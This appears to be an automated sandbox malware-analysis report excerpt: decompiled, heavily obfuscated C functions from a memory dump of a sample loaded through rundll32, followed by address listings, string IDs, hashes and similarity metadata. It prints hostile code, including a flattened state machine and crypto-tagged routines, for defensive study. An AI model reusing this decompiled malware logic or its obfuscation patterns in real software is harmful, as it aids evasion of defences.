				_v2664 = _v2664 ^ 0x50bf8d15;
				_v2724 = 0xb2ae33;
				_t426 = 0x22;
				_v2724 = _v2724 / _t426;
				_v2724 = _v2724 << 1;
				_v2724 = _v2724 ^ 0x6c628229;
				_v2724 = _v2724 ^ 0x6c6ae222;
				_v2640 = 0xd32362;
				_v2640 = _v2640 + 0xffff88f4;
				_v2640 = _v2640 ^ 0x00d4f71b;
				_v2648 = 0x3e5b4d;
				_v2648 = _v2648 + 0x4f8c;
				_v2648 = _v2648 ^ 0x003b681e;
				_v2676 = 0xc6bb8b;
				_v2676 = _v2676 << 4;
				_t427 = 0x14;
				_v2676 = _v2676 / _t427;
				_v2676 = _v2676 ^ 0x009ad4f5;
				_v2720 = 0xa3b34d;
				_v2720 = _v2720 + 0xffff97dd;
				_v2720 = _v2720 | 0x7136ebef;
				_v2720 = _v2720 ^ 0x71b8bb4e;
				_v2692 = 0xa7ff58;
				_t404 = _v2692 * 0x31;
				_v2692 = _t404;
				_v2692 = _v2692 >> 4;
				_v2692 = _v2692 ^ 0x020bdfc2;
				_v2624 = 0xa501ce;
				_v2624 = _v2624 | 0xdc20330f;
				_v2624 = _v2624 ^ 0xdca3e6f8;
				_v2632 = 0xa992b7;
				_v2632 = _v2632 | 0x4e4d69fe;
				_v2632 = _v2632 ^ 0x4ee71179;
				while(_t464 != 0x2953b22) {
					if(_t464 == 0x422d362) {
						_t464 = 0xe704baa;
						continue;
					} else {
						_t475 = _t464 - 0xe704baa;
						if(_t464 != 0xe704baa) {
							L8:
							__eflags = _t464 - 0x740d40c;
							if(__eflags != 0) {
								continue;
							}
						} else {
							E002D12A8(_t427, _v2684, _t475, _v2768, _v2736,  &_v2600);
							 *((short*)(E002C4FA8(_v2760,  &_v2600, _v2744, _v2604))) = 0;
							E002B8650(_v2712,  &_v1560, _t475, _v2728);
							_push(_v2612);
							_push(_v2680);
							_push(0x2b181c);
							E002BE7CE(E002BAB66(_v2752, _v2660, _t475), _t475, _v2672,  &_v2600, _v2752, _v2772, _v2776, _v2652, _v2620,  &_v1560);
							E002BAE03(_v2688, _v2704, _v2644, _t415);
							_t427 = _v2764;
							_t404 = E002CC38F(_t427,  &_v2080, _t463, _v2696);
							_t468 =  &(_t468[0x15]);
							if(_t404 != 0) {
								_t464 = 0x2953b22;
								continue;
							}
						}
					}
					return _t404;
				}
				_push(_t427);
				E002BEA7B( &_v1040, _v2708, _v2716, _t427, _v2636, _v2756, _v2608);
				_push(_v2616);
				_push(_v2748);
				_push(0x2b18cc);
				E002BE7CE(E002BAB66(_v2668, _v2628, __eflags), __eflags, _v2700,  &_v1040, _v2668, _v2732, _v2656, _v2740, _v2664,  &_v2080);
				_t430 = _v2724;
				E002BAE03(_t430, _v2640, _v2648, _t406);
				_push(_v2632);
				_push(_v2624);
				_push(_v2692);
				_push(0);
				_push(0);
				_push(_v2720);
				_push(_t430);
				_push(0);
				_t427 =  &_v520;
				_t404 = E002B9700(_t427, _v2676, __eflags);
				_t468 =  &(_t468[0x1c]);
				_t464 = 0x740d40c;
				goto L8;
			}
































































                                                                                                                      0x002b7b82
                                                                                                                      0x002b7b88
                                                                                                                      0x002b7b92
                                                                                                                      0x002b7b97
                                                                                                                      0x002b7b9c
                                                                                                                      0x002b7ba4
                                                                                                                      0x002b7bac
                                                                                                                      0x002b7bb4
                                                                                                                      0x002b7bbc
                                                                                                                      0x002b7bc4
                                                                                                                      0x002b7bcc
                                                                                                                      0x002b7bd4
                                                                                                                      0x002b7bd9
                                                                                                                      0x002b7be1
                                                                                                                      0x002b7be9
                                                                                                                      0x002b7bf1
                                                                                                                      0x002b7bf9
                                                                                                                      0x002b7c08
                                                                                                                      0x002b7c0c
                                                                                                                      0x002b7c0e
                                                                                                                      0x002b7c16
                                                                                                                      0x002b7c1b
                                                                                                                      0x002b7c23
                                                                                                                      0x002b7c28
                                                                                                                      0x002b7c30
                                                                                                                      0x002b7c38
                                                                                                                      0x002b7c40
                                                                                                                      0x002b7c4d
                                                                                                                      0x002b7c50
                                                                                                                      0x002b7c59
                                                                                                                      0x002b7c5d
                                                                                                                      0x002b7c65
                                                                                                                      0x002b7c6d
                                                                                                                      0x002b7c78
                                                                                                                      0x002b7c83
                                                                                                                      0x002b7c8e
                                                                                                                      0x002b7c96
                                                                                                                      0x002b7c9e
                                                                                                                      0x002b7ca6
                                                                                                                      0x002b7cae
                                                                                                                      0x002b7cb6
                                                                                                                      0x002b7cbe
                                                                                                                      0x002b7cc6
                                                                                                                      0x002b7cce
                                                                                                                      0x002b7cd6
                                                                                                                      0x002b7ce6
                                                                                                                      0x002b7cea
                                                                                                                      0x002b7cf2
                                                                                                                      0x002b7cfa
                                                                                                                      0x002b7d05
                                                                                                                      0x002b7d10
                                                                                                                      0x002b7d1b
                                                                                                                      0x002b7d27
                                                                                                                      0x002b7d2a
                                                                                                                      0x002b7d33
                                                                                                                      0x002b7d37
                                                                                                                      0x002b7d3f
                                                                                                                      0x002b7d52
                                                                                                                      0x002b7d59
                                                                                                                      0x002b7d64
                                                                                                                      0x002b7d6c
                                                                                                                      0x002b7d70
                                                                                                                      0x002b7d78
                                                                                                                      0x002b7d80
                                                                                                                      0x002b7d88
                                                                                                                      0x002b7d8d
                                                                                                                      0x002b7d95
                                                                                                                      0x002b7d9f
                                                                                                                      0x002b7da7
                                                                                                                      0x002b7daf
                                                                                                                      0x002b7db7
                                                                                                                      0x002b7dbf
                                                                                                                      0x002b7dc7
                                                                                                                      0x002b7ddc
                                                                                                                      0x002b7ddf
                                                                                                                      0x002b7de6
                                                                                                                      0x002b7df1
                                                                                                                      0x002b7dfc
                                                                                                                      0x002b7e07
                                                                                                                      0x002b7e12
                                                                                                                      0x002b7e1a
                                                                                                                      0x002b7e22
                                                                                                                      0x002b7e2a
                                                                                                                      0x002b7e32
                                                                                                                      0x002b7e3a
                                                                                                                      0x002b7e42
                                                                                                                      0x002b7e4a
                                                                                                                      0x002b7e52
                                                                                                                      0x002b7e65
                                                                                                                      0x002b7e6c
                                                                                                                      0x002b7e77
                                                                                                                      0x002b7e7f
                                                                                                                      0x002b7e87
                                                                                                                      0x002b7e8f
                                                                                                                      0x002b7e94
                                                                                                                      0x002b7e9c
                                                                                                                      0x002b7ea4
                                                                                                                      0x002b7eac
                                                                                                                      0x002b7eb4
                                                                                                                      0x002b7ebc
                                                                                                                      0x002b7ec4
                                                                                                                      0x002b7ecc
                                                                                                                      0x002b7ed4
                                                                                                                      0x002b7ee7
                                                                                                                      0x002b7eee
                                                                                                                      0x002b7ef9
                                                                                                                      0x002b7f01
                                                                                                                      0x002b7f09
                                                                                                                      0x002b7f11
                                                                                                                      0x002b7f16
                                                                                                                      0x002b7f1e
                                                                                                                      0x002b7f29
                                                                                                                      0x002b7f34
                                                                                                                      0x002b7f3f
                                                                                                                      0x002b7f47
                                                                                                                      0x002b7f4f
                                                                                                                      0x002b7f57
                                                                                                                      0x002b7f6d
                                                                                                                      0x002b7f74
                                                                                                                      0x002b7f7f
                                                                                                                      0x002b7f87
                                                                                                                      0x002b7f8f
                                                                                                                      0x002b7f9c
                                                                                                                      0x002b7f9d
                                                                                                                      0x002b7fa1
                                                                                                                      0x002b7fa9
                                                                                                                      0x002b7fb4
                                                                                                                      0x002b7fbc
                                                                                                                      0x002b7fc7
                                                                                                                      0x002b7fcf
                                                                                                                      0x002b7fdd
                                                                                                                      0x002b7fe1
                                                                                                                      0x002b7fe9
                                                                                                                      0x002b7ff1
                                                                                                                      0x002b7ff6
                                                                                                                      0x002b7ffe
                                                                                                                      0x002b8008
                                                                                                                      0x002b8015
                                                                                                                      0x002b8020
                                                                                                                      0x002b802b
                                                                                                                      0x002b8036
                                                                                                                      0x002b803e
                                                                                                                      0x002b804c
                                                                                                                      0x002b8051
                                                                                                                      0x002b8057
                                                                                                                      0x002b805f
                                                                                                                      0x002b8067
                                                                                                                      0x002b8072
                                                                                                                      0x002b807a
                                                                                                                      0x002b8085
                                                                                                                      0x002b8091
                                                                                                                      0x002b8096
                                                                                                                      0x002b809c
                                                                                                                      0x002b80a0
                                                                                                                      0x002b80a8
                                                                                                                      0x002b80b0
                                                                                                                      0x002b80bb
                                                                                                                      0x002b80c6
                                                                                                                      0x002b80d1
                                                                                                                      0x002b80dc
                                                                                                                      0x002b80e7
                                                                                                                      0x002b80f2
                                                                                                                      0x002b80fa
                                                                                                                      0x002b8103
                                                                                                                      0x002b8106
                                                                                                                      0x002b810a
                                                                                                                      0x002b8112
                                                                                                                      0x002b811a
                                                                                                                      0x002b8122
                                                                                                                      0x002b812a
                                                                                                                      0x002b8132
                                                                                                                      0x002b813a
                                                                                                                      0x002b813f
                                                                                                                      0x002b8143
                                                                                                                      0x002b8148
                                                                                                                      0x002b8150
                                                                                                                      0x002b815b
                                                                                                                      0x002b8166
                                                                                                                      0x002b8171
                                                                                                                      0x002b817c
                                                                                                                      0x002b8187
                                                                                                                      0x002b8192
                                                                                                                      0x002b81a0
                                                                                                                      0x002b82a5
                                                                                                                      0x00000000
                                                                                                                      0x002b81a6
                                                                                                                      0x002b81a6
                                                                                                                      0x002b81ac
                                                                                                                      0x002b838b
                                                                                                                      0x002b838b
                                                                                                                      0x002b8391
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x002b81b2
                                                                                                                      0x002b81c6
                                                                                                                      0x002b81f3
                                                                                                                      0x002b81fa
                                                                                                                      0x002b81ff
                                                                                                                      0x002b8206
                                                                                                                      0x002b8218
                                                                                                                      0x002b825e
                                                                                                                      0x002b8276
                                                                                                                      0x002b8282
                                                                                                                      0x002b828e
                                                                                                                      0x002b8293
                                                                                                                      0x002b8298
                                                                                                                      0x002b829e
                                                                                                                      0x00000000
                                                                                                                      0x002b829e
                                                                                                                      0x002b8298
                                                                                                                      0x002b81ac
                                                                                                                      0x002b83a0
                                                                                                                      0x002b83a0
                                                                                                                      0x002b82af
                                                                                                                      0x002b82d2
                                                                                                                      0x002b82d7
                                                                                                                      0x002b82de
                                                                                                                      0x002b82f0
                                                                                                                      0x002b8333
                                                                                                                      0x002b8347
                                                                                                                      0x002b834b
                                                                                                                      0x002b8353
                                                                                                                      0x002b835a
                                                                                                                      0x002b8361
                                                                                                                      0x002b8365
                                                                                                                      0x002b8367
                                                                                                                      0x002b8369
                                                                                                                      0x002b8374
                                                                                                                      0x002b8375
                                                                                                                      0x002b8377
                                                                                                                      0x002b837e
                                                                                                                      0x002b8383
                                                                                                                      0x002b8386
                                                                                                                      0x00000000

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000B.00000002.443285949.00000000002B1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                      • Associated: 0000000B.00000002.443281134.00000000002B0000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443300447.00000000002D5000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_11_2_2b0000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: AzK$G?$M[>$[B$]\$h$$mP$z-$R)$6q
                                                                                                                      • API String ID: 0-2334141070
                                                                                                                      • Opcode ID: dac6ac3afee83520dacbeccdcc4bd325f5cf65b4b1fb99dc57fc8b98cb77958e
                                                                                                                      • Instruction ID: baf1e978c42777235f9fe1ef7f1fc7a489dd54af3d5d6e2263452f1b04c21c96
                                                                                                                      • Opcode Fuzzy Hash: dac6ac3afee83520dacbeccdcc4bd325f5cf65b4b1fb99dc57fc8b98cb77958e
                                                                                                                      • Instruction Fuzzy Hash: 22121F71518381DFD3A8CF21C58AA8BFBE1BBC5758F108A1DE2D986260D7B18919CF47
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 002C74DD Relevance: 12.8, Strings: 10, Instructions: 335COMMONCrypto
                                                                                                                      Download Yara Rule
                                                                                                                      C-Code - Quality: 97%
                                                                                                                      			E002C74DD() {
				intOrPtr _v4;
				intOrPtr _v8;
				char _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				signed int _v124;
				unsigned int _v128;
				unsigned int _v132;
				signed int _v136;
				signed int _v140;
				signed int _v144;
				signed int _v148;
				signed int _v152;
				void* _t373;
				signed int* _t377;
				signed int _t381;
				signed int _t383;
				signed int* _t384;
				void* _t385;
				intOrPtr _t396;
				signed int _t398;
				signed int _t399;
				signed int _t400;
				signed int _t401;
				signed int _t402;
				signed int _t403;
				signed int _t404;
				signed int _t405;
				signed int _t406;
				signed int _t407;
				signed int _t408;
				void* _t409;
				signed int* _t410;
				signed int* _t444;
				void* _t452;
				signed int* _t456;

				_t456 =  &_v152;
				_v8 = 0x511491;
				_t396 = 0;
				_t452 = 0x68b0bf3;
				_v4 = 0;
				_v108 = 0xf5425d;
				_t398 = 0x24;
				_v108 = _v108 / _t398;
				_v108 = _v108 | 0xbb3a7fab;
				_v108 = _v108 ^ 0xbb3effbb;
				_v132 = 0xf54152;
				_v132 = _v132 + 0x73b9;
				_v132 = _v132 | 0x673a86bd;
				_v132 = _v132 >> 4;
				_v132 = _v132 ^ 0x067ffb7b;
				_v36 = 0x17d741;
				_v36 = _v36 << 0xe;
				_v36 = _v36 ^ 0xf5d04000;
				_v72 = 0xb99ed8;
				_t399 = 0x74;
				_v72 = _v72 * 0x57;
				_v72 = _v72 ^ 0x28cb8c28;
				_v72 = _v72 ^ 0x17df7740;
				_v100 = 0xb82182;
				_v100 = _v100 >> 2;
				_v100 = _v100 | 0xc07135d2;
				_v100 = _v100 ^ 0xc07f3df2;
				_v120 = 0x71fefc;
				_v120 = _v120 ^ 0x3c3b57cf;
				_v120 = _v120 ^ 0xde073c70;
				_v120 = _v120 + 0xffffefcb;
				_v120 = _v120 ^ 0xe24618f4;
				_v128 = 0x9b3c32;
				_v128 = _v128 >> 0xb;
				_v128 = _v128 ^ 0x48395a77;
				_v128 = _v128 >> 0xf;
				_v128 = _v128 ^ 0x000e9da5;
				_v136 = 0x52cc3f;
				_v136 = _v136 * 0x6b;
				_v136 = _v136 ^ 0x9c4f2321;
				_v136 = _v136 | 0xfd912896;
				_v136 = _v136 ^ 0xffd2684a;
				_v48 = 0x5298d7;
				_v48 = _v48 ^ 0x46ea6646;
				_v48 = _v48 ^ 0x46b0922b;
				_v112 = 0xeb4fde;
				_v112 = _v112 / _t399;
				_v112 = _v112 >> 0xc;
				_t400 = 0x56;
				_v112 = _v112 / _t400;
				_v112 = _v112 ^ 0x0003a7ac;
				_v52 = 0x2cac0;
				_v52 = _v52 + 0x2e2d;
				_v52 = _v52 ^ 0x00080243;
				_v124 = 0x3dbea4;
				_v124 = _v124 + 0x560a;
				_v124 = _v124 >> 0x10;
				_v124 = _v124 >> 9;
				_v124 = _v124 ^ 0x00027af4;
				_v56 = 0x4e9164;
				_v56 = _v56 >> 0xd;
				_v56 = _v56 ^ 0x00077014;
				_v28 = 0x1ac9f;
				_v28 = _v28 << 7;
				_v28 = _v28 ^ 0x00d40977;
				_v148 = 0xc87974;
				_t401 = 0xf;
				_v148 = _v148 / _t401;
				_v148 = _v148 + 0x3bc4;
				_v148 = _v148 >> 2;
				_v148 = _v148 ^ 0x0004ff8e;
				_v140 = 0x51bf99;
				_v140 = _v140 + 0x1f0d;
				_v140 = _v140 | 0x6ce4c515;
				_v140 = _v140 << 7;
				_v140 = _v140 ^ 0x7aef3c21;
				_v64 = 0x9041a6;
				_v64 = _v64 | 0xf9fd38a0;
				_v64 = _v64 + 0x56fc;
				_v64 = _v64 ^ 0xf9f31663;
				_v96 = 0xb1a19;
				_v96 = _v96 + 0x5234;
				_t402 = 0x68;
				_v96 = _v96 * 0x32;
				_v96 = _v96 ^ 0x0237c494;
				_v152 = 0x354a37;
				_v152 = _v152 | 0x37184972;
				_v152 = _v152 ^ 0x144b30cb;
				_v152 = _v152 * 0x1f;
				_v152 = _v152 ^ 0x4b54d1c6;
				_v116 = 0xf3726e;
				_v116 = _v116 + 0xcc69;
				_v116 = _v116 >> 3;
				_v116 = _v116 + 0x674b;
				_v116 = _v116 ^ 0x001624aa;
				_v44 = 0x3b88ac;
				_v44 = _v44 / _t402;
				_v44 = _v44 ^ 0x00096110;
				_v20 = 0x83fd7f;
				_v20 = _v20 ^ 0x5c57be60;
				_v20 = _v20 ^ 0x5cd84720;
				_v144 = 0x80ab55;
				_t403 = 0x46;
				_v144 = _v144 / _t403;
				_v144 = _v144 + 0xffffcaef;
				_v144 = _v144 + 0xffff67c3;
				_v144 = _v144 ^ 0x00052ea0;
				_v16 = 0xeb356a;
				_t199 =  &_v16; // 0xeb356a
				_t404 = 0x65;
				_v16 =  *_t199 / _t404;
				_v16 = _v16 ^ 0x000ce393;
				_v88 = 0xe75d2;
				_v88 = _v88 + 0xe1a2;
				_v88 = _v88 ^ 0xbfa107b7;
				_v88 = _v88 ^ 0xbfa92cf6;
				_v40 = 0xb57020;
				_t405 = 0x18;
				_v40 = _v40 / _t405;
				_v40 = _v40 ^ 0x000d9612;
				_v80 = 0xaa39d6;
				_t406 = 0x4c;
				_v80 = _v80 / _t406;
				_t407 = 0x4f;
				_v80 = _v80 / _t407;
				_v80 = _v80 ^ 0x000dd886;
				_v84 = 0x7565b2;
				_v84 = _v84 ^ 0x85e60cd2;
				_v84 = _v84 | 0xe2f126fa;
				_v84 = _v84 ^ 0xe7fbef1f;
				_v92 = 0x20921c;
				_v92 = _v92 << 0xf;
				_t408 = 0x3d;
				_v92 = _v92 / _t408;
				_v92 = _v92 ^ 0x0137fd8d;
				_v104 = 0x7d1988;
				_v104 = _v104 | 0x48f8c783;
				_v104 = _v104 * 0x2a;
				_v104 = _v104 >> 4;
				_v104 = _v104 ^ 0x0f9ace16;
				_v32 = 0xc6b5a4;
				_v32 = _v32 ^ 0x611852a0;
				_v32 = _v32 ^ 0x61d9018e;
				_v24 = 0x4e0063;
				_v24 = _v24 * 0x56;
				_v24 = _v24 ^ 0x1a371aa3;
				_v60 = 0xb39a6a;
				_v60 = _v60 + 0x379a;
				_v60 = _v60 << 0xb;
				_v60 = _v60 ^ 0x9e9cdd6f;
				_v68 = 0xe7ba26;
				_v68 = _v68 + 0xffffbb05;
				_v68 = _v68 ^ 0xbd703087;
				_v68 = _v68 ^ 0xbd98ca1c;
				_v76 = 0x8102f3;
				_v76 = _v76 << 6;
				_v76 = _v76 * 0x7c;
				_v76 = _v76 ^ 0x9f574684;
				while(1) {
					L1:
					_t444 =  *0x2d5c90; // 0x0
					_t373 = 0x882fd94;
					do {
						if(_t452 == 0x68b0bf3) {
							_push(_t408);
							_push(_t408);
							_t409 = 0x28;
							_t377 = E002C3512(_t409);
							 *0x2d5c90 = _t377;
							_t377[3] = 0x4000;
							_t410 =  *0x2d5c90; // 0x0
							_t381 = E002C3512(_t410[3]);
							_t444 =  *0x2d5c90; // 0x0
							_t452 = 0xf7a4d1a;
							_t408 = _t381;
							_t383 = _t444[3] + _t408;
							__eflags = _t383;
							_t444[2] = _t408;
							_t444[1] = _t408;
							 *_t444 = _t408;
							_t444[5] = _t383;
							L12:
							_t373 = 0x882fd94;
							goto L13;
						}
						if(_t452 == _t373) {
							_t384 =  *0x2d5c90; // 0x0
							_t408 = _v20;
							_t385 = E002BC795(_t408, _v144, _v36, _t384[3], _t384[2], _v12, _v16, _v88);
							_t456 =  &(_t456[6]);
							__eflags = _t385 - _v72;
							if(__eflags != 0) {
								_t452 = 0xcb14d1c;
							} else {
								_t452 = 0xd2040d1;
								_t396 = 1;
							}
							goto L1;
						}
						if(_t452 == 0xcb14d1c) {
							E002B68DE(_v84, _v92, _v104, _v32, _t444[2]);
							E002B68DE(_v24, _v60, _v68, _v76,  *0x2d5c90);
							L17:
							return _t396;
						}
						if(_t452 == 0xd2040d1) {
							E002B7027(_v40, _v100, _v12, _v80);
							goto L17;
						}
						_t463 = _t452 - 0xf7a4d1a;
						if(_t452 != 0xf7a4d1a) {
							goto L13;
						}
						_push(_v148);
						_push(_v28);
						_push(0x2b1324);
						E002C0EDA(0, _v108, _v140, E002BAB66(_v124, _v56, _t463),  &_v12, _v64, _v96);
						_t408 = _v152;
						_t452 =  ==  ? 0x882fd94 : 0xcb14d1c;
						E002BAE03(_t408, _v116, _v44, _t390);
						_t444 =  *0x2d5c90; // 0x0
						_t456 =  &(_t456[0xa]);
						goto L12;
						L13:
					} while (_t452 != 0xd072e76);
					goto L17;
				}
			}
































































                                                                                                                      0x002c74dd
                                                                                                                      0x002c74e3
                                                                                                                      0x002c74f4
                                                                                                                      0x002c74f6
                                                                                                                      0x002c74fb
                                                                                                                      0x002c7502
                                                                                                                      0x002c7518
                                                                                                                      0x002c751d
                                                                                                                      0x002c7523
                                                                                                                      0x002c752b
                                                                                                                      0x002c7533
                                                                                                                      0x002c753b
                                                                                                                      0x002c7543
                                                                                                                      0x002c754b
                                                                                                                      0x002c7550
                                                                                                                      0x002c7558
                                                                                                                      0x002c7563
                                                                                                                      0x002c756b
                                                                                                                      0x002c7576
                                                                                                                      0x002c7583
                                                                                                                      0x002c7586
                                                                                                                      0x002c758a
                                                                                                                      0x002c7592
                                                                                                                      0x002c759a
                                                                                                                      0x002c75a2
                                                                                                                      0x002c75a7
                                                                                                                      0x002c75af
                                                                                                                      0x002c75b7
                                                                                                                      0x002c75bf
                                                                                                                      0x002c75c7
                                                                                                                      0x002c75cf
                                                                                                                      0x002c75d7
                                                                                                                      0x002c75df
                                                                                                                      0x002c75e7
                                                                                                                      0x002c75ec
                                                                                                                      0x002c75f4
                                                                                                                      0x002c75f9
                                                                                                                      0x002c7601
                                                                                                                      0x002c760e
                                                                                                                      0x002c7612
                                                                                                                      0x002c761a
                                                                                                                      0x002c7622
                                                                                                                      0x002c762a
                                                                                                                      0x002c7632
                                                                                                                      0x002c763a
                                                                                                                      0x002c7642
                                                                                                                      0x002c7652
                                                                                                                      0x002c7656
                                                                                                                      0x002c765f
                                                                                                                      0x002c7662
                                                                                                                      0x002c7666
                                                                                                                      0x002c766e
                                                                                                                      0x002c7676
                                                                                                                      0x002c767e
                                                                                                                      0x002c7686
                                                                                                                      0x002c768e
                                                                                                                      0x002c7696
                                                                                                                      0x002c769b
                                                                                                                      0x002c76a0
                                                                                                                      0x002c76a8
                                                                                                                      0x002c76b0
                                                                                                                      0x002c76b5
                                                                                                                      0x002c76bd
                                                                                                                      0x002c76ca
                                                                                                                      0x002c76d2
                                                                                                                      0x002c76dd
                                                                                                                      0x002c76eb
                                                                                                                      0x002c76f0
                                                                                                                      0x002c76f6
                                                                                                                      0x002c76fe
                                                                                                                      0x002c7703
                                                                                                                      0x002c770b
                                                                                                                      0x002c7713
                                                                                                                      0x002c771b
                                                                                                                      0x002c7723
                                                                                                                      0x002c7728
                                                                                                                      0x002c7730
                                                                                                                      0x002c7738
                                                                                                                      0x002c7740
                                                                                                                      0x002c7748
                                                                                                                      0x002c7750
                                                                                                                      0x002c7758
                                                                                                                      0x002c7765
                                                                                                                      0x002c7768
                                                                                                                      0x002c776c
                                                                                                                      0x002c7774
                                                                                                                      0x002c777c
                                                                                                                      0x002c7784
                                                                                                                      0x002c7791
                                                                                                                      0x002c7795
                                                                                                                      0x002c779d
                                                                                                                      0x002c77a5
                                                                                                                      0x002c77ad
                                                                                                                      0x002c77b2
                                                                                                                      0x002c77ba
                                                                                                                      0x002c77c2
                                                                                                                      0x002c77d8
                                                                                                                      0x002c77df
                                                                                                                      0x002c77ea
                                                                                                                      0x002c77f5
                                                                                                                      0x002c7800
                                                                                                                      0x002c780b
                                                                                                                      0x002c7817
                                                                                                                      0x002c781c
                                                                                                                      0x002c7822
                                                                                                                      0x002c782a
                                                                                                                      0x002c7832
                                                                                                                      0x002c783a
                                                                                                                      0x002c7845
                                                                                                                      0x002c784c
                                                                                                                      0x002c7851
                                                                                                                      0x002c785a
                                                                                                                      0x002c7865
                                                                                                                      0x002c786d
                                                                                                                      0x002c7875
                                                                                                                      0x002c787d
                                                                                                                      0x002c7885
                                                                                                                      0x002c7897
                                                                                                                      0x002c789a
                                                                                                                      0x002c78a1
                                                                                                                      0x002c78ac
                                                                                                                      0x002c78c1
                                                                                                                      0x002c78c6
                                                                                                                      0x002c78d0
                                                                                                                      0x002c78d5
                                                                                                                      0x002c78db
                                                                                                                      0x002c78e3
                                                                                                                      0x002c78eb
                                                                                                                      0x002c78f3
                                                                                                                      0x002c78fb
                                                                                                                      0x002c7903
                                                                                                                      0x002c790b
                                                                                                                      0x002c7914
                                                                                                                      0x002c7917
                                                                                                                      0x002c791b
                                                                                                                      0x002c7923
                                                                                                                      0x002c792b
                                                                                                                      0x002c7938
                                                                                                                      0x002c793c
                                                                                                                      0x002c7941
                                                                                                                      0x002c7949
                                                                                                                      0x002c7954
                                                                                                                      0x002c795f
                                                                                                                      0x002c796a
                                                                                                                      0x002c797d
                                                                                                                      0x002c7984
                                                                                                                      0x002c798f
                                                                                                                      0x002c7997
                                                                                                                      0x002c799f
                                                                                                                      0x002c79a4
                                                                                                                      0x002c79ac
                                                                                                                      0x002c79b4
                                                                                                                      0x002c79bc
                                                                                                                      0x002c79c4
                                                                                                                      0x002c79cc
                                                                                                                      0x002c79d4
                                                                                                                      0x002c79de
                                                                                                                      0x002c79e2
                                                                                                                      0x002c79ea
                                                                                                                      0x002c79ea
                                                                                                                      0x002c79ea
                                                                                                                      0x002c79f0
                                                                                                                      0x002c79f5
                                                                                                                      0x002c79fb
                                                                                                                      0x002c7afa
                                                                                                                      0x002c7afb
                                                                                                                      0x002c7afe
                                                                                                                      0x002c7aff
                                                                                                                      0x002c7b04
                                                                                                                      0x002c7b09
                                                                                                                      0x002c7b1f
                                                                                                                      0x002c7b28
                                                                                                                      0x002c7b2d
                                                                                                                      0x002c7b33
                                                                                                                      0x002c7b3a
                                                                                                                      0x002c7b3f
                                                                                                                      0x002c7b3f
                                                                                                                      0x002c7b41
                                                                                                                      0x002c7b44
                                                                                                                      0x002c7b47
                                                                                                                      0x002c7b49
                                                                                                                      0x002c7b4c
                                                                                                                      0x002c7b4c
                                                                                                                      0x00000000
                                                                                                                      0x002c7b4c
                                                                                                                      0x002c7a03
                                                                                                                      0x002c7aa8
                                                                                                                      0x002c7ac5
                                                                                                                      0x002c7acc
                                                                                                                      0x002c7ad1
                                                                                                                      0x002c7ad4
                                                                                                                      0x002c7ad8
                                                                                                                      0x002c7ae7
                                                                                                                      0x002c7ada
                                                                                                                      0x002c7adc
                                                                                                                      0x002c7ae1
                                                                                                                      0x002c7ae1
                                                                                                                      0x00000000
                                                                                                                      0x002c7ad8
                                                                                                                      0x002c7a0b
                                                                                                                      0x002c7b94
                                                                                                                      0x002c7bb5
                                                                                                                      0x002c7bc0
                                                                                                                      0x002c7bc9
                                                                                                                      0x002c7bc9
                                                                                                                      0x002c7a17
                                                                                                                      0x002c7b75
                                                                                                                      0x00000000
                                                                                                                      0x002c7b7b
                                                                                                                      0x002c7a1d
                                                                                                                      0x002c7a23
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x002c7a29
                                                                                                                      0x002c7a2d
                                                                                                                      0x002c7a3c
                                                                                                                      0x002c7a63
                                                                                                                      0x002c7a83
                                                                                                                      0x002c7a87
                                                                                                                      0x002c7a8a
                                                                                                                      0x002c7a8f
                                                                                                                      0x002c7a95
                                                                                                                      0x00000000
                                                                                                                      0x002c7b51
                                                                                                                      0x002c7b51
                                                                                                                      0x00000000
                                                                                                                      0x002c7b5d

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000B.00000002.443285949.00000000002B1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                      • Associated: 0000000B.00000002.443281134.00000000002B0000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443300447.00000000002D5000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_11_2_2b0000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: V$!<z$-.$4R$7J5$FfF$Kg$c$j5$wZ9H
                                                                                                                      • API String ID: 0-218644068
                                                                                                                      • Opcode ID: 0402698428e5107d5477c528a230919997ffd6addd13130091d66653888053f4
                                                                                                                      • Instruction ID: e302119a38cde4eaff24dc502f884b917eafc29a9a243a402b8a3b059f69b923
                                                                                                                      • Opcode Fuzzy Hash: 0402698428e5107d5477c528a230919997ffd6addd13130091d66653888053f4
                                                                                                                      • Instruction Fuzzy Hash: 530232715083808FD3A8CF25D48AA4BFBF2FBC5758F50891DF29986260D7B58958CF02
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 10021854 Relevance: 12.1, APIs: 8, Instructions: 129filestringCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • __EH_prolog3.LIBCMT ref: 10021873
                                                                                                                      • GetFullPathNameA.KERNEL32(?,00000104,?,?,00000014), ref: 100218B4
                                                                                                                        • Part of subcall function 100201F1: __CxxThrowException@8.LIBCMT ref: 10020205
